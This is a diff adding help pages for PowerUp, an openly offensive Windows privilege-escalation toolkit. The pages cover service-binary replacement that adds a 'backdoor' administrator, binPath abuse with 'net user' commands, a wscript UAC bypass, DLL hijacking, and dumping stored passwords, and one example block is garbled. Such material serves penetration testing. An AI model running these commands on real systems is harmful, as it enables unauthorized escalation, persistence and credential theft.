+s1admin s1password 192.168.1.101\server1 C:\App1 C:\App1\web.config No +s1user s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No +s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\test\web.config No +s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\web.config Yes +s3user s3password 192.168.1.103\server3 D:\App3 D:\App3\web.config No + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Boolean + +System.Data.DataTable + +## NOTES +Below is an alterantive method for grabbing connection strings, but it doesn't support decryption. +for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings + +Author: Scott Sutherland - 2014, NetSPI +Author: Antti Rantasaari - 2014, NetSPI + +## RELATED LINKS + +[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx) + diff --git a/docs/Privesc/Install-ServiceBinary.md b/docs/Privesc/Install-ServiceBinary.md new file mode 100755 index 0000000..bc75a2a --- /dev/null +++ b/docs/Privesc/Install-ServiceBinary.md @@ -0,0 +1,175 @@ +# Install-ServiceBinary + +## SYNOPSIS +Replaces the service binary for the specified service with one that executes +a specified command as SYSTEM. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary + +## SYNTAX + +``` +Install-ServiceBinary [-Name] [-UserName ] [-Password ] [-LocalGroup ] + [-Credential ] [-Command ] +``` + +## DESCRIPTION +Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the +current user can modify the associated service binary listed in the binPath. +Backs up +the original service binary to "OriginalService.exe.bak" in service binary location, +and then uses Write-ServiceBinary to create a C# service binary that either adds +a local administrator user or executes a custom command. +The new service binary is +replaced in the original service binary path, and a custom object is returned that +captures the original and new service binary configuration. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Install-ServiceBinary +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds TESTLAB\john to the Administrators local group. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (backdoor/Password123!). + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC -Command "net ..." +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that executes a custom command. + +## PARAMETERS + +### -Name +The service name the EXE will be running under. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.ServiceBinary.Installed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Invoke-PrivescAudit.md b/docs/Privesc/Invoke-PrivescAudit.md new file mode 100755 index 0000000..7110962 --- /dev/null +++ b/docs/Privesc/Invoke-PrivescAudit.md @@ -0,0 +1,63 @@ +# Invoke-PrivescAudit + +## SYNOPSIS +Executes all functions that check for various Windows privilege escalation opportunities. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Invoke-PrivescAudit [-HTMLReport] +``` + +## DESCRIPTION +Executes all functions that check for various Windows privilege escalation opportunities. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-PrivescAudit +``` + +Runs all escalation checks and outputs a status report for discovered issues. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-PrivescAudit -HTMLReport +``` + +Runs all escalation checks and outputs a status report to SYSTEM.username.html +detailing any discovered issues. + +## PARAMETERS + +### -HTMLReport +Switch. +Write a HTML version of the report to SYSTEM.username.html. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.String + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Invoke-ServiceAbuse.md b/docs/Privesc/Invoke-ServiceAbuse.md new file mode 100755 index 0000000..8d493d7 --- /dev/null +++ b/docs/Privesc/Invoke-ServiceAbuse.md @@ -0,0 +1,194 @@ +# Invoke-ServiceAbuse + +## SYNOPSIS +Abuses a function the current user has configuration rights on in order +to add a local administrator or execute a custom command. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath + +## SYNTAX + +``` +Invoke-ServiceAbuse [-Name] [-UserName ] [-Password ] [-LocalGroup ] + [-Credential ] [-Command ] [-Force] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current +user has configuration modification rights on and executes a series of automated actions to +execute commands as SYSTEM. +First, the service is enabled if it was set as disabled and the +original service binary path and configuration state are preserved. +Then the service is stopped +and the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a +series of commands, the service is started, stopped, and the next command is configured. +After +completion, the original service configuration is restored and a custom object is returned +that captures the service abused and commands run. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC +``` + +Abuses service 'VulnSVC' to add a localuser "john" with password +"Password123! +to the machine and local administrator group + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Invoke-ServiceAbuse +``` + +Abuses service 'VulnSVC' to add a localuser "john" with password +"Password123! +to the machine and local administrator group + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john" +``` + +Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the +local adminisrtators group. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users" +``` + +Abuses service 'VulnSVC' to add a localuser "backdoor" with password +"password" to the machine and local "Power Users" group + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC -Command "net ..." +``` + +Abuses service 'VulnSVC' to execute a custom command. + +## PARAMETERS + +### -Name +An array of one or more service names to abuse. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Force +Switch. +Force service stopping, even if other services are dependent. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.AbusedService + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Invoke-WScriptUACBypass.md b/docs/Privesc/Invoke-WScriptUACBypass.md new file mode 100755 index 0000000..f9eeb8d --- /dev/null +++ b/docs/Privesc/Invoke-WScriptUACBypass.md @@ -0,0 +1,85 @@ +# Invoke-WScriptUACBypass + +## SYNOPSIS +Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. + +Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Invoke-WScriptUACBypass [-Command] [-WindowStyle ] +``` + +## DESCRIPTION +Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute +VBScript using the wscript executable with the new manifest. +The VBScript executed by +C:\Windows\wscript.exe will run elevated. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +" +``` + +Launches the specified PowerShell encoded command in high-integrity. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible' +``` + +Spawns a high integrity cmd.exe. + +## PARAMETERS + +### -Command +The shell command you want wscript.exe to run elevated. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CMD + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -WindowStyle +Whether to display or hide the window for the executed '-Command X'. +Accepted values are 'Hidden' and 'Normal'/'Visible. +Default is 'Hidden'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Hidden +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html +https://github.com/Vozzie/uacscript +https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html +https://github.com/Vozzie/uacscript +https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1) + diff --git a/docs/Privesc/Restore-ServiceBinary.md b/docs/Privesc/Restore-ServiceBinary.md new file mode 100755 index 0000000..a88fc29 --- /dev/null +++ b/docs/Privesc/Restore-ServiceBinary.md @@ -0,0 +1,87 @@ +# Restore-ServiceBinary + +## SYNOPSIS +Restores a service binary backed up by Install-ServiceBinary. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath + +## SYNTAX + +``` +Restore-ServiceBinary [-Name] [[-BackupPath] ] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline and +checks for the existence of an "OriginalServiceBinary.exe.bak" in the service +binary location. +If it exists, the backup binary is restored to the original +binary path. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Restore-ServiceBinary -Name VulnSVC +``` + +Restore the original binary for the service 'VulnSVC'. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Restore-ServiceBinary +``` + +Restore the original binary for the service 'VulnSVC'. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe' +``` + +Restore the original binary for the service 'VulnSVC' from a custom location. + +## PARAMETERS + +### -Name +The service name to restore a binary for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -BackupPath +Optional manual path to the backup binary. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.ServiceBinary.Installed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Set-ServiceBinaryPath.md b/docs/Privesc/Set-ServiceBinaryPath.md new file mode 100755 index 0000000..b39926f --- /dev/null +++ b/docs/Privesc/Set-ServiceBinaryPath.md @@ -0,0 +1,92 @@ +# Set-ServiceBinaryPath + +## SYNOPSIS +Sets the binary path for a service to a specified value. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Set-ServiceBinaryPath [-Name] [-Path] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a +service handle to the service with ConfigControl access using the GetServiceHandle +Win32 API call. +ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath) +to the string value specified by binPath, and the handle is closed off. + +Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a +Dacl field to each object. +It does this by opening a handle with ReadControl for the +service with using the GetServiceHandle Win32 API call and then uses +QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add' +``` + +Sets the binary path for 'VulnSvc' to be a command to add a user. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add' +``` + +Sets the binary path for 'VulnSvc' to be a command to add a user. + +## PARAMETERS + +### -Name +An array of one or more service names to set the binary path for. +Required. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +The new binary path (lpBinaryPathName) to set for the specified service. +Required. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: BinaryPath, binPath + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Boolean + +$True if configuration succeeds, $False otherwise. + +## NOTES + +## RELATED LINKS + +[https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx) + diff --git a/docs/Privesc/Test-ServiceDaclPermission.md b/docs/Privesc/Test-ServiceDaclPermission.md new file mode 100755 index 0000000..2251a11 --- /dev/null +++ b/docs/Privesc/Test-ServiceDaclPermission.md @@ -0,0 +1,112 @@ +# Test-ServiceDaclPermission + +## SYNOPSIS +Tests one or more passed services or service names against a given permission set, +returning the service objects where the current user have the specified permissions. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Add-ServiceDacl + +## SYNTAX + +``` +Test-ServiceDaclPermission [-Name] [-Permissions ] [-PermissionSet ] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds +a service Dacl to the service object with Add-ServiceDacl. +All group SIDs for the current +user are enumerated services where the user has some type of permission are filtered. +The +services are then filtered against a specified set of permissions, and services where the +current user have the specified permissions are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Service | Test-ServiceDaclPermission +``` + +Return all service objects where the current user can modify the service configuration. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart' +``` + +Return all service objects that the current user can restart. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC' +``` + +Return the VulnSVC object if the current user has start permissions. + +## PARAMETERS + +### -Name +An array of one or more service names to test against the specified permission set. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName, Service + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Permissions +A manual set of permission to test again. +One of:'QueryConfig', 'ChangeConfig', 'QueryStatus', +'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl', +'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity', +'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess' + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PermissionSet +A pre-defined permission set to test a specified service against. +'ChangeConfig', 'Restart', or 'AllAccess'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: ChangeConfig +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### ServiceProcess.ServiceController + +## NOTES + +## RELATED LINKS + +[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) + diff --git a/docs/Privesc/Write-HijackDll.md b/docs/Privesc/Write-HijackDll.md new file mode 100755 index 0000000..d38e3e7 --- /dev/null +++ b/docs/Privesc/Write-HijackDll.md @@ -0,0 +1,173 @@ +# Write-HijackDll + +## SYNOPSIS +Patches in the path to a specified .bat (containing the specified command) into a +pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Write-HijackDll [-DllPath] [[-Architecture] ] [[-BatPath] ] [[-UserName] ] + [[-Password] ] [[-LocalGroup] ] [[-Credential] ] [[-Command] ] +``` + +## DESCRIPTION +First builds a self-deleting .bat file that executes the specified -Command or local user, +to add and writes the.bat out to -BatPath. +The BatPath is then patched into a pre-compiled +C++ DLL that is built to be hijackable by the IKEEXT service. +There are two DLLs, one for +x86 and one for x64, and both are contained as base64-encoded strings. +The DLL is then +written out to the specified OutputFile. + +## EXAMPLES + +### Example 1 +``` +PS C:\> {{ Add example code here }} +``` + +{{ Add example description here }} + +## PARAMETERS + +### -DllPath +File name to write the generated DLL out to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Architecture +The Architecture to generate for the DLL, x86 or x64. +If not specified, PowerUp +will try to automatically determine the correct architecture. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -BatPath +Path to the .bat for the DLL to launch. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 8 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Write-ServiceBinary.md b/docs/Privesc/Write-ServiceBinary.md new file mode 100755 index 0000000..7d588a5 --- /dev/null +++ b/docs/Privesc/Write-ServiceBinary.md @@ -0,0 +1,191 @@ +# Write-ServiceBinary + +## SYNOPSIS +Patches in the specified command to a pre-compiled C# service executable and +writes the binary out to the specified ServicePath location. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Write-ServiceBinary [-Name] [-UserName ] [-Password ] [-LocalGroup ] + [-Credential ] [-Command ] [-Path ] +``` + +## DESCRIPTION +Takes a pre-compiled C# service binary and patches in the appropriate commands needed +for service abuse. +If a -UserName/-Password or -Credential is specified, the command +patched in creates a local user and adds them to the specified -LocalGroup, otherwise +the specified -Command is patched in. +The binary is then written out to the specified +-ServicePath. +Either -Name must be specified for the service, or a proper object from +Get-Service must be passed on the pipeline in order to patch in the appropriate service +name the binary will be running under. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Write-ServiceBinary +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that adds +TESTLAB\john to the Administrators local group. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (backdoor/Password123!). + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC -Command "net ..." +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +executes a custom command. + +## PARAMETERS + +### -Name +The service name the EXE will be running under. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Path +Path to write the binary out to, defaults to 'service.exe' in the local directory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: "$(Convert-Path .)\service.exe" +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.ServiceBinary + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Write-UserAddMSI.md b/docs/Privesc/Write-UserAddMSI.md new file mode 100755 index 0000000..cac959d --- /dev/null +++ b/docs/Privesc/Write-UserAddMSI.md @@ -0,0 +1,56 @@ +# Write-UserAddMSI + +## SYNOPSIS +Writes out a precompiled MSI installer that prompts for a user/group addition. +This function can be used to abuse Get-RegistryAlwaysInstallElevated. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Write-UserAddMSI [[-Path] ] +``` + +## DESCRIPTION +Writes out a precompiled MSI installer that prompts for a user/group addition. +This function can be used to abuse Get-RegistryAlwaysInstallElevated. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Write-UserAddMSI +``` + +Writes the user add MSI to the local directory. + +## PARAMETERS + +### -Path +{{Fill Path Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: False +Position: 1 +Default value: UserAdd.msi +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.UserAddMSI + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/index.md b/docs/Privesc/index.md new file mode 100644 index 0000000..836e674 --- /dev/null +++ b/docs/Privesc/index.md @@ -0,0 +1,55 @@ +## PowerUp + +PowerUp aims to be a clearinghouse of common Windows privilege escalation +vectors that rely on misconfigurations. + +Running Invoke-AllChecks will output any identifiable vulnerabilities along +with specifications for any abuse functions. The -HTMLReport flag will also +generate a COMPUTER.username.html version of the report. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + + +### Token/Privilege Enumeration/Abuse: + Get-ProcessTokenGroup - returns all SIDs that the current token context is a part of, whether they are disabled or not + Get-ProcessTokenPrivilege - returns all privileges for the current (or specified) process ID + Enable-Privilege - enables a specific privilege for the current process + +### Service Enumeration/Abuse: + Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set + Get-UnquotedService - returns services with unquoted paths that also have a space in the name + Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config + Get-ModifiableService - returns services the current user can modify + Get-ServiceDetail - returns detailed information about a specified service + Set-ServiceBinaryPath - sets the binary path for a service to a specified value + Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command + Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command + Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command + Restore-ServiceBinary - restores a replaced service binary with the original executable + +### DLL Hijacking: + Find-ProcessDLLHijack - finds potential DLL hijacking opportunities for currently running processes + Find-PathDLLHijack - finds service %PATH% DLL hijacking opportunities + Write-HijackDll - writes out a hijackable DLL + +### Registry Checks: + Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set + Get-RegistryAutoLogon - checks for Autologon credentials in the registry + Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns + +### Miscellaneous Checks: + Get-ModifiableScheduledTaskFile - find schtasks with modifiable target files + Get-UnattendedInstallFile - finds remaining unattended installation files + Get-Webconfig - checks for any encrypted web.config strings + Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords + Get-SiteListPassword - retrieves the plaintext passwords for any found McAfee's SiteList.xml files + Get-CachedGPPPassword - checks for passwords in cached Group Policy Preferences files + +### Other Helpers/Meta-Functions: + Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify + Write-UserAddMSI - write out a MSI installer that prompts for a user to be added + Invoke-WScriptUACBypass - performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe + Invoke-PrivescAudit - runs all current escalation checks and returns a report (formerly Invoke-AllChecks) diff --git a/docs/index.md b/docs/index.md index 67ddcbc..8cd53ea 100644 --- a/docs/index.md +++ b/docs/index.md @@ -61,6 +61,7 @@ Cause general mayhem with PowerShell. Tools to help with escalating privileges on a target, including PowerUp. PowerUp - Clearing 